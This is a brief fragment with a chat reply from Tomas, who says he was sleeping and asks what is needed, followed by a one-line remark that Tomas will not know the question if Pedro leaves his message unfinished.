– Tomas: Sorry, I was sleeping, what do you need?

If Pedro forgets to write the rest of the message, Tomas will be left wondering what the question was.
